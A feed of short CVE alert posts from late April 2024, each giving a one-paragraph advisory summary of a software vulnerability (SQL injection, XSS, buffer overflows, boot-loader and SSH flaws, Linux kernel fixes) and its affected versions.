🚨 CVE-2023-40547A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.🎖@cveNotify |
|
| 2024-04-30 10:37:30 |
🚨 CVE-2024-4337Adive Framework 2.0.8, does not sufficiently encode user-controlled inputs, resulting in a persistent Cross-Site Scripting (XSS) vulnerability via the /adive/admin/nav/add, in multiple parameters. This vulnerability allows an attacker to retrieve the session details of an authenticated user.🎖@cveNotify |
|
| 2024-04-30 10:37:26 |
🚨 CVE-2024-22405XADMaster is an objective-C library for archive and file unarchiving and extraction. When extracting a specially crafted zip archive XADMaster may not apply quarantine attribute correctly. Such behaviour may circumvent Gatekeeper checks on the system. Only macOS installations are affected. This issue was fixed in XADMaster 1.10.8. It is recommended to upgrade to the latest version. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-04-30 10:37:25 |
🚨 CVE-2024-30204In Emacs before 29.3, LaTeX preview is enabled by default for e-mail attachments.🎖@cveNotify |
|
| 2024-04-30 10:37:24 |
🚨 CVE-2024-30203In Emacs before 29.3, Gnus treats inline MIME contents as trusted.🎖@cveNotify |
|
| 2024-04-30 07:37:26 |
🚨 CVE-2024-4225Multiple security vulnerabilities has been discovered in web interface of NetGuardian DIN Remote Telemetry Unit (RTU), by DPS Telecom. Attackers can exploit those security vulnerabilities to perform critical actions such as escalate user's privilege, steal user's credential, Cross Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).🎖@cveNotify |
|
| 2024-04-30 07:37:25 |
🚨 CVE-2024-28815A vulnerability in the BluStar component of Mitel InAttend 2.6 SP4 through 2.7 and CMG 8.5 SP4 through 8.6 could allow access to sensitive information, changes to the system configuration, or execution of arbitrary commands within the context of the system.🎖@cveNotify |
|
| 2024-04-30 07:37:24 |
🚨 CVE-2017-7938Stack-based buffer overflow in DMitry (Deepmagic Information Gathering Tool) version 1.3a (Unix) allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a long argument. An example threat model is automated execution of DMitry with hostname strings found in local log files.🎖@cveNotify |
|
| 2024-04-30 03:37:24 |
🚨 CVE-2024-1371The LeadConnector plugin for WordPress is vulnerable to unauthorized modification & loss of data due to a missing capability check on the lc_public_api_proxy() function in all versions up to, and including, 1.7. This makes it possible for unauthenticated attackers to delete arbitrary posts.🎖@cveNotify |
|
| 2024-04-30 02:37:25 |
🚨 CVE-2024-4226It was identified that in certain versions of Octopus Server, that a user created with no permissions could view all users, user roles and permissions. This functionality was removed in versions of Octopus Server after the fixed versions listed.🎖@cveNotify |
|
| 2024-04-30 02:37:24 |
🚨 CVE-2024-0216The Google Doc Embedder plugin for WordPress is vulnerable to Server Side Request Forgery via the 'gview' shortcode in versions up to, and including, 2.6.4. This can allow authenticated attackers with contributor-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-04-30 01:37:24 |
🚨 CVE-2024-4327A vulnerability was found in Apryse WebViewer up to 10.8.0. It has been classified as problematic. This affects an unknown part of the component PDF Document Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.9 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-262419. NOTE: The vendor was contacted early about this disclosure and explains that the documentation recommends a strict Content Security Policy and the issue was fixed in release 10.9.🎖@cveNotify |
|
| 2024-04-30 00:37:32 |
🚨 CVE-2024-34043O-RAN RICAPP kpimon-go I-Release has a segmentation violation via a certain E2AP-PDU message.🎖@cveNotify |
|
| 2024-04-30 00:37:25 |
🚨 CVE-2023-52726Open Networking Foundation SD-RAN ONOS onos-ric-sdk-go 0.8.12 allows infinite repetition of the processing of an error (in the Subscribe function implementation for the subscribed indication stream).🎖@cveNotify |
|
| 2024-04-30 00:37:24 |
🚨 CVE-2023-52724Open Networking Foundation SD-RAN onos-kpimon 0.4.7 allows out-of-bounds array access in the processIndicationFormat1 function.🎖@cveNotify |
|
| 2024-04-29 23:37:24 |
🚨 CVE-2024-33522In vulnerable versions of Calico (v3.27.2 and below), Calico Enterprise (v3.19.0-1, v3.18.1, v3.17.3 and below), and Calico Cloud (v19.2.0 and below), an attacker who has local access to the Kubernetes node, can escalate their privileges by exploiting a vulnerability in the Calico CNI install binary. The issue arises from an incorrect SUID (Set User ID) bit configuration in the binary, combined with the ability to control the input binary, allowing an attacker to execute an arbitrary binary with elevated privileges.🎖@cveNotify |
|
| 2024-04-29 22:37:27 |
🚨 CVE-2024-33401Cross Site Scripting vulnerability in DedeCMS v.5.7.113 allows a remote attacker to run arbitrary code via the mnum parameter.🎖@cveNotify |
|
| 2024-04-29 22:37:26 |
🚨 CVE-2023-50432simple-dhcp-server through ec976d2 allows remote attackers to cause a denial of service (daemon crash) by sending a DHCP packet without any option fields, which causes free_packet in dhcp_packet.c to dereference a NULL pointer.🎖@cveNotify |
|
| 2024-04-29 21:37:32 |
🚨 CVE-2024-28294Limbas up to v5.2.14 was discovered to contain a SQL injection vulnerability via the ftid parameter.🎖@cveNotify |
|
| 2024-04-29 21:37:31 |
🚨 CVE-2023-46960Buffer Overflow vulnerability in PyPXE v.1.8.4 allows a remote attacker to cause a denial of service via the handle function in the tftp module.🎖@cveNotify |
|
| 2024-04-29 21:37:27 |
🚨 CVE-2023-46566Buffer Overflow vulnerability in msoulier tftpy commit 467017b844bf6e31745138a30e2509145b0c529c allows a remote attacker to cause a denial of service via the parse function in the TftpPacketFactory class.🎖@cveNotify |
|
| 2024-04-29 21:37:26 |
🚨 CVE-2024-27322Deserialization of untrusted data can occur in the R statistical programming language, on any version starting at 1.4.0 up to and not including 4.4.0, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-04-29 21:37:25 |
🚨 CVE-2023-48022Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment🎖@cveNotify |
|
| 2024-04-29 20:37:36 |
🚨 CVE-2024-33276SQL Injection vulnerability in FME Modules preorderandnotication v.3.1.0 and before allows a remote attacker to run arbitrary SQL commands via the PreorderModel::getIdProductAttributesByIdAttributes() method.🎖@cveNotify |
|
| 2024-04-29 20:37:32 |
🚨 CVE-2024-33271An issue in FME Modules eventsmanager before 4.4.0 allows an attacker to obtain sensitive information from the ps_customer component.🎖@cveNotify |
|
| 2024-04-29 20:37:31 |
🚨 CVE-2024-33268SQL Injection vulnerability in Digincube mdgiftproduct before 1.4.1 allows an attacker to run arbitrary SQL commands via the MdGiftRule::addGiftToCart method.🎖@cveNotify |
|
| 2024-04-29 20:37:30 |
🚨 CVE-2024-33266SQL Injection vulnerability in Helloshop deliveryorderautoupdate v.2.8.1 and before allows an attacker to run arbitrary SQL commands via the DeliveryorderautoupdateOrdersModuleFrontController::initContent function.🎖@cveNotify |
|
| 2024-04-29 20:37:26 |
🚨 CVE-2023-46565Buffer Overflow vulnerability in osrg gobgp commit 419c50dfac578daa4d11256904d0dc182f1a9b22 allows a remote attacker to cause a denial of service via the handlingError function in pkg/server/fsm.go.🎖@cveNotify |
|
| 2024-04-29 20:37:25 |
🚨 CVE-2024-27448MailDev 2 through 2.1.0 allows Remote Code Execution via a crafted Content-ID header for an e-mail attachment, leading to lib/mailserver.js writing arbitrary code into the routes.js file.🎖@cveNotify |
|
| 2024-04-29 20:37:24 |
🚨 CVE-2024-22773Intelbras Action RF 1200 routers 1.2.2 and earlier and Action RG 1200 routers 2.1.7 and earlier expose the Password in Cookie resulting in Login Bypass.🎖@cveNotify |
|
| 2024-04-29 20:07:26 |
🚨 CVE-2024-26884In the Linux kernel, the following vulnerability has been resolved:bpf: Fix hashtab overflow check on 32-bit archesThe hashtab code relies on roundup_pow_of_two() to compute the number ofhash buckets, and contains an overflow check by checking if theresulting value is 0. However, on 32-bit arches, the roundup code itselfcan overflow by doing a 32-bit left-shift of an unsigned long value,which is undefined behaviour, so it is not guaranteed to truncateneatly. This was triggered by syzbot on the DEVMAP_HASH type, whichcontains the same check, copied from the hashtab code. So apply the samefix to hashtab, by moving the overflow check to before the roundup.🎖@cveNotify |
|
| 2024-04-29 20:07:25 |
🚨 CVE-2024-25007Ericsson Network Manager (ENM), versions prior to 23.1, contains a vulnerability in the export function of application log where Improper Neutralization of Formula Elements in a CSV File can lead to code execution or information disclosure. There is limited impact to integrity and availability. The attacker on the adjacent network with administration access can exploit the vulnerability.🎖@cveNotify |
|
| 2024-04-29 20:07:24 |
🚨 CVE-2023-50811An issue discovered in SELESTA Visual Access Manager 4.38.6 allows attackers to modify the “computer” POST parameter related to the ID of a specific reception by POST HTTP request interception. Iterating that parameter, it has been possible to access to the application and take control of many other receptions in addition the assigned one.🎖@cveNotify |
|
| 2024-04-29 19:37:37 |
🚨 CVE-2024-0840The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.🎖@cveNotify |
|
| 2024-04-29 19:37:36 |
🚨 CVE-2024-26913In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Fix dcn35 8k30 Underflow/Corruption Issue[why]odm calculation is missing for pipe split policy determinationand cause Underflow/Corruption issue.[how]Add the odm calculation.🎖@cveNotify |
|
| 2024-04-29 19:37:32 |
🚨 CVE-2024-26912In the Linux kernel, the following vulnerability has been resolved:drm/nouveau: fix several DMA buffer leaksNouveau manages GSP-RM DMA buffers with nvkm_gsp_mem objects. Several ofthese buffers are never dealloced. Some of them can be deallocatedright after GSP-RM is initialized, but the rest need to stay until thedriver unloads.Also futher bullet-proof these objects by poisoning the buffer andclearing the nvkm_gsp_mem object when it is deallocated. Poisoningthe buffer should trigger an error (or crash) from GSP-RM if it triesto access the buffer after we've deallocated it, because we were wrongabout when it is safe to deallocate.Finally, change the mem->size field to a size_t because that's the sametype that dma_alloc_coherent expects.🎖@cveNotify |
|
| 2024-04-29 19:37:31 |
🚨 CVE-2024-26910In the Linux kernel, the following vulnerability has been resolved:netfilter: ipset: fix performance regression in swap operationThe patch "netfilter: ipset: fix race condition between swap/destroyand kernel side add/del/test", commit 28628fa9 fixes a race condition.But the synchronize_rcu() added to the swap function unnecessarily slowsit down: it can safely be moved to destroy and use call_rcu() instead.Eric Dumazet pointed out that simply calling the destroy functions asrcu callback does not work: sets with timeout use garbage collectorswhich need cancelling at destroy which can wait. Therefore the destroyfunctions are split into two: cancelling garbage collectors safely atexecuting the command received by netlink and moving the remainingpart only into the rcu callback.🎖@cveNotify |
|
| 2024-04-29 19:37:30 |
🚨 CVE-2024-26899In the Linux kernel, the following vulnerability has been resolved:block: fix deadlock between bd_link_disk_holder and partition scan'open_mutex' of gendisk is used to protect open/close block devices. Butin bd_link_disk_holder(), it is used to protect the creation of symlinkbetween holding disk and slave bdev, which introduces some issues.When bd_link_disk_holder() is called, the driver is usually in the processof initialization/modification and may suspend submitting io. At thistime, any io hold 'open_mutex', such as scanning partitions, can causedeadlocks. For example, in raid:T1 T2bdev_open_by_dev lock open_mutex [1] ... efi_partition ... md_submit_bio md_ioctl mddev_syspend -> suspend all io md_add_new_disk bind_rdev_to_array bd_link_disk_holder try lock open_mutex [2] md_handle_request -> wait mddev_resumeT1 scan partition, T2 add a new device to raid. T1 waits for T2 to resumemddev, but T2 waits for open_mutex held by T1. Deadlock occurs.Fix it by introducing a local mutex 'blk_holder_mutex' to replace'open_mutex'.🎖@cveNotify |
|
| 2024-04-29 19:37:26 |
🚨 CVE-2024-31083A use-after-free vulnerability was found in the ProcRenderAddGlyphs() function of Xorg servers. This issue occurs when AllocateGlyph() is called to store new glyphs sent by the client to the X server, potentially resulting in multiple entries pointing to the same non-refcounted glyphs. Consequently, ProcRenderAddGlyphs() may free a glyph, leading to a use-after-free scenario when the same glyph pointer is subsequently accessed. This flaw allows an authenticated attacker to execute arbitrary code on the system by sending a specially crafted request.🎖@cveNotify |
|
| 2024-04-29 19:37:25 |
🚨 CVE-2024-31080A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIGetSelectedEvents() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-04-29 19:37:24 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-04-29 19:07:27 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-04-29 19:07:26 |
🚨 CVE-2020-12101The address-management feature in xt:Commerce 5.1 to 6.2.2 allows remote authenticated users to zero out other user's stored addresses by manipulating an id field in the POST request for altering an address.🎖@cveNotify |
|
| 2024-04-29 18:37:36 |
🚨 CVE-2024-33438File Upload vulnerability in CubeCart before 6.5.5 allows an authenticated user to execute arbitrary code via a crafted .phar file.🎖@cveNotify |
|
| 2024-04-29 18:37:32 |
🚨 CVE-2024-33345D-Link DIR-823G A1V1.0.2B05 was found to contain a Null-pointer dereference in the main function of upload_firmware.cgi, which allows remote attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-04-29 18:37:31 |
🚨 CVE-2024-31823An issue in Ecommerce-CodeIgniter-Bootstrap commit v. d22b54e8915f167a135046ceb857caaf8479c4da allows a remote attacker to execute arbitrary code via the removeSecondaryImage method of the Publish.php component.🎖@cveNotify |
|
| 2024-04-29 18:37:30 |
🚨 CVE-2024-31821SQL Injection vulnerability in Ecommerce-CodeIgniter-Bootstrap commit v. d22b54e8915f167a135046ceb857caaf8479c4da allows a remote attacker to execute arbitrary code via the manageQuantitiesAndProcurement method of the Orders_model.php component.🎖@cveNotify |
|
| 2024-04-29 18:37:26 |
🚨 CVE-2024-31820An issue in Ecommerce-CodeIgniter-Bootstrap commit v. d22b54e8915f167a135046ceb857caaf8479c4da allows a remote attacker to execute arbitrary code via the getLangFolderForEdit method of the Languages.php component.🎖@cveNotify |
|
| 2024-04-29 18:37:25 |
🚨 CVE-2023-52080IEIT NF5280M6 UEFI firmware through 8.4 has a pool overflow vulnerability, caused by improper use of the gRT->GetVariable() function. Attackers with access to local NVRAM variables can exploit this by modifying these variables on SPI Flash, resulting in memory data being tampered with. When critical data in memory data is tampered with,a crash may occur.🎖@cveNotify |
|
| 2024-04-29 18:37:24 |
🚨 CVE-2023-51254Cross Site Scripting vulnerability in Jfinalcms v.5.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the friendship link component.🎖@cveNotify |
|
| 2024-04-29 17:37:31 |
🚨 CVE-2024-33449An SSRF issue in the PDFMyURL service allows a remote attacker to obtain sensitive information and execute arbitrary code via a POST request in the url parameter🎖@cveNotify |
|
| 2024-04-29 17:37:30 |
🚨 CVE-2024-33444SQL injection vulnerability in onethink v.1.1 allows a remote attacker to escalate privileges via a crafted script to the ModelModel.class.php component.🎖@cveNotify |
|
| 2024-04-29 17:37:26 |
🚨 CVE-2024-32492An issue was discovered in Znuny 7.0.1 through 7.0.16 where the ticket detail view in the customer front allows the execution of external JavaScript.🎖@cveNotify |
|
| 2024-04-29 17:37:25 |
🚨 CVE-2024-32269An issue in Yonganda YAD-LOJ V3.0.561 allows a remote attacker to cause a denial of service via a crafted packet.🎖@cveNotify |
|
| 2024-04-29 17:37:24 |
🚨 CVE-2024-31621An issue in FlowiseAI Inc Flowise v.1.6.2 and before allows a remote attacker to execute arbitrary code via a crafted script to the api/v1 component.🎖@cveNotify |
|
| 2024-04-29 16:37:31 |
🚨 CVE-2024-34011Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 37758.🎖@cveNotify |
|
| 2024-04-29 16:37:30 |
🚨 CVE-2024-34010Local privilege escalation due to unquoted search path vulnerability. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 37758.🎖@cveNotify |
|
| 2024-04-29 16:37:26 |
🚨 CVE-2024-23995Cross Site Scripting (XSS) in Beekeeper Studio 4.1.13 and earlier allows remote attackers to execute arbitrary code in the column name of a database table in tabulator-popup-container.🎖@cveNotify |
|
| 2024-04-29 16:37:25 |
🚨 CVE-2023-48683Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 37758.🎖@cveNotify |
|
| 2024-04-29 16:37:24 |
🚨 CVE-2023-46270MacPaw The Unarchiver before 4.3.6 contains vulnerability related to missing quarantine attributes for extracted items.🎖@cveNotify |
|
| 2024-04-29 14:38:17 |
🚨 CVE-2024-1579Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG) vulnerability in Secomea GateManager (Webserver modules) allows Session Hijacking.This issue affects GateManager: before 11.2.624071020.🎖@cveNotify |
|
| 2024-04-29 14:38:13 |
🚨 CVE-2024-30205In Emacs before 29.3, Org mode considers contents of remote files to be trusted. This affects Org Mode before 9.6.23.🎖@cveNotify |
|
| 2024-04-29 14:38:12 |
🚨 CVE-2024-30203In Emacs before 29.3, Gnus treats inline MIME contents as trusted.🎖@cveNotify |
|
| 2024-04-29 14:38:11 |
🚨 CVE-2023-40551A flaw was found in the MZ binary format in Shim. An out-of-bounds read may occur, leading to a crash or possible exposure of sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-29 14:38:07 |
🚨 CVE-2023-40550An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-29 14:38:06 |
🚨 CVE-2023-40546A flaw was found in Shim when an error happened while creating a new ESL variable. If Shim fails to create the new variable, it tries to print an error message to the user; however, the number of parameters used by the logging function doesn't match the format string used by it, leading to a crash under certain circumstances.🎖@cveNotify |
|
| 2024-04-29 14:38:05 |
🚨 CVE-2023-40547A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.🎖@cveNotify |
|
| 2024-04-29 13:37:47 |
🚨 CVE-2024-4308SQL injection vulnerability in HubBank affecting version 1.0.2. This vulnerability could allow an attacker to send a specially crafted SQL query to the database through different endpoints (/admin/view_users.php?id=1,/admin/viewloan-trans.php?id=1,/admin/view-deposit.php?id=1,/admin/view-domtrans.php?id=1, /admin/delete_cards.php?id=1,/admin/view_cards.php?id=1 and /admin/view_users.php?id=1, id parameter) and retrieve the information stored in the database.🎖@cveNotify |
|
| 2024-04-29 13:37:46 |
🚨 CVE-2024-4307SQL injection vulnerability in HubBank affecting version 1.0.2. This vulnerability could allow an attacker to send a specially crafted SQL query to the database through different endpoints (/accounts/activities.php?id=1, /accounts/view-deposit.php?id=1, /accounts/view_cards. php?id=1, /accounts/wire-transfer.php?id=1 and /accounts/wiretransfer-pending.php?id=1, id parameter) and retrieve the information stored in the database.🎖@cveNotify |
|
| 2024-04-29 13:37:42 |
🚨 CVE-2024-33588Missing Authorization vulnerability in codeSavory Knowledge Base documentation & wiki plugin – BasePress.This issue affects Knowledge Base documentation & wiki plugin – BasePress: from n/a through 2.16.1.🎖@cveNotify |
|
| 2024-04-29 13:37:41 |
🚨 CVE-2024-33586Missing Authorization vulnerability in Photo Gallery Team Photo Gallery by 10Web.This issue affects Photo Gallery by 10Web: from n/a through 1.8.20.🎖@cveNotify |
|
| 2024-04-29 13:37:40 |
🚨 CVE-2024-27322Deserialization of untrusted data can occur in the R statistical programming language, on any version starting at 1.4.0 up to and not including 4.4.0, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user’s system when interacted with.🎖@cveNotify |
|
| 2024-04-29 13:07:43 |
🚨 CVE-2024-31741Cross Site Scripting vulnerability in MiniCMS v.1.11 allows a remote attacker to run arbitrary code via crafted string in the URL after login.🎖@cveNotify |
|
| 2024-04-29 13:07:42 |
🚨 CVE-2024-28322SQL Injection vulnerability in /event-management-master/backend/register.php in PuneethReddyHC Event Management 1.0 allows attackers to run arbitrary SQL commands via the event_id parameter in a crafted POST request.🎖@cveNotify |
|
| 2024-04-29 13:07:38 |
🚨 CVE-2024-4242A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been rated as critical. This issue affects the function formwrlSSIDget of the file /goform/wifiSSIDget. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-29 13:07:37 |
🚨 CVE-2024-4240A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been classified as critical. This affects the function formQosManageDouble_user. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-262131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-29 13:07:36 |
🚨 CVE-2024-32887Sidekiq is simple, efficient background processing for Ruby. Sidekiq is reflected XSS vulnerability. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc. This issue has been patched in version 7.2.4.🎖@cveNotify |
|
| 2024-04-29 13:07:32 |
🚨 CVE-2024-32883MCUboot is a secure bootloader for 32-bits microcontrollers. MCUboot uses a TLV (tag-length-value) structure to represent the meta data associated with an image. The TLVs themselves are divided into two sections, a protected and an unprotected section. The protected TLV entries are included as part of the image signature to avoid tampering. However, the code does not distinguish which TLV entries should be protected or not, so it is possible for an attacker to add unprotected TLV entries that should be protected. Currently, the primary protected TLV entries should be the dependency indication, and the boot record. An injected dependency value would primarily result in an otherwise acceptable image being rejected. A boot record injection could allow fields in a later attestation record to include data not intended, which could cause an image to appear to have properties that it should not have. As a workaround, disable the boot record functionality.🎖@cveNotify |
|
| 2024-04-29 12:37:45 |
🚨 CVE-2024-4304A Cross-Site Scripting XSS vulnerability has been detected on GT3 Soluciones SWAL. This vulnerability consists in a reflected XSS in the Titular parameter inside Gestion 'Documental > Seguimiento de Expedientes > Alta de Expedientes'.🎖@cveNotify |
|
| 2024-04-29 12:37:44 |
🚨 CVE-2024-1258A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file api/config/params.php of the component API. The manipulation of the argument JWT_KEY_ADMIN leads to use of hard-coded cryptographic key . The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252997 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-29 11:37:44 |
🚨 CVE-2024-33590Server-Side Request Forgery (SSRF) vulnerability in codeSavory Knowledge Base documentation & wiki plugin – BasePress.This issue affects Knowledge Base documentation & wiki plugin – BasePress: from n/a through 2.16.1.🎖@cveNotify |
|
| 2024-04-29 11:37:43 |
🚨 CVE-2024-26146Rack is a modular Ruby web server interface. Carefully crafted headers can cause header parsing in Rack to take longer than expected resulting in a possible denial of service issue. Accept and Forwarded headers are impacted. Ruby 3.2 has mitigations for this problem, so Rack applications using Ruby 3.2 or newer are unaffected. This vulnerability is fixed in 2.0.9.4, 2.1.4.4, 2.2.8.1, and 3.0.9.1.🎖@cveNotify |
|
| 2024-04-29 11:37:42 |
🚨 CVE-2024-25126Rack is a modular Ruby web server interface. Carefully crafted content type headers can cause Rack’s media type parser to take much longer than expected, leading to a possible denial of service vulnerability (ReDos 2nd degree polynomial). This vulnerability is patched in 3.0.9.1 and 2.2.8.1.🎖@cveNotify |
|
| 2024-04-29 10:37:32 |
🚨 CVE-2024-33595Missing Authorization vulnerability in Jewel Theme Master Addons for Elementor.This issue affects Master Addons for Elementor: from n/a through 2.0.5.4.1.🎖@cveNotify |
|
| 2024-04-29 10:37:28 |
🚨 CVE-2024-33593Missing Authorization vulnerability in RedNao Smart Forms.This issue affects Smart Forms: from n/a through 2.6.91.🎖@cveNotify |
|
| 2024-04-29 10:37:27 |
🚨 CVE-2024-3196A vulnerability was found in MailCleaner up to 2023.03.14. It has been declared as critical. This vulnerability affects the function getStats/Services_silentDump/Services_stopStartMTA/Config_saveDateTime/Config_hostid/Logs_StartGetStat/dumpConfiguration of the component SOAP Service. The manipulation leads to os command injection. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-262312.🎖@cveNotify |
|
| 2024-04-29 10:37:26 |
🚨 CVE-2024-3192A vulnerability, which was classified as problematic, was found in MailCleaner up to 2023.03.14. Affected is an unknown function of the component Admin Interface. The manipulation as part of Mail Message leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-262308.🎖@cveNotify |
|
| 2024-04-29 09:37:39 |
🚨 CVE-2024-33684Missing Authorization vulnerability in Pdfcrowd Save as PDF plugin by Pdfcrowd allows Stored XSS.This issue affects Save as PDF plugin by Pdfcrowd: from n/a through 3.2.0.🎖@cveNotify |
|
| 2024-04-29 09:37:38 |
🚨 CVE-2024-33635Missing Authorization vulnerability in Piotnet Piotnet Addons For Elementor Pro.This issue affects Piotnet Addons For Elementor Pro: from n/a through 7.1.17.🎖@cveNotify |
|
| 2024-04-29 09:37:37 |
🚨 CVE-2024-33597Missing Authorization vulnerability in ProFaceOff SSU.This issue affects SSU: from n/a through 1.5.0.🎖@cveNotify |
|
| 2024-04-29 09:37:33 |
🚨 CVE-2024-33596Missing Authorization vulnerability in Five Star Plugins Five Star Restaurant Reservations.This issue affects Five Star Restaurant Reservations: from n/a through 2.6.16.🎖@cveNotify |
|
| 2024-04-29 09:37:32 |
🚨 CVE-2024-28961Dell OpenManage Enterprise, versions 4.0.0 and 4.0.1, contains a sensitive information disclosure vulnerability. A local low privileged malicious user could potentially exploit this vulnerability to obtain credentials leading to unauthorized access with elevated privileges. This could lead to further attacks, thus Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2024-04-29 09:37:31 |
🚨 CVE-2024-32109Cross-Site Request Forgery (CSRF) vulnerability in Julien Berthelot / MPEmbed.Com WP Matterport Shortcode allows Cross Site Request Forgery.This issue affects WP Matterport Shortcode: from n/a through 2.1.9.🎖@cveNotify |
|
| 2024-04-29 09:37:27 |
🚨 CVE-2024-27956Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.🎖@cveNotify |
|
| 2024-04-29 09:37:26 |
